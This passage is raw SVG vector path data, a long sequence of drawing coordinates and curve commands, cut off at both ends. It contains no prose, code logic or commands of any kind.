1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9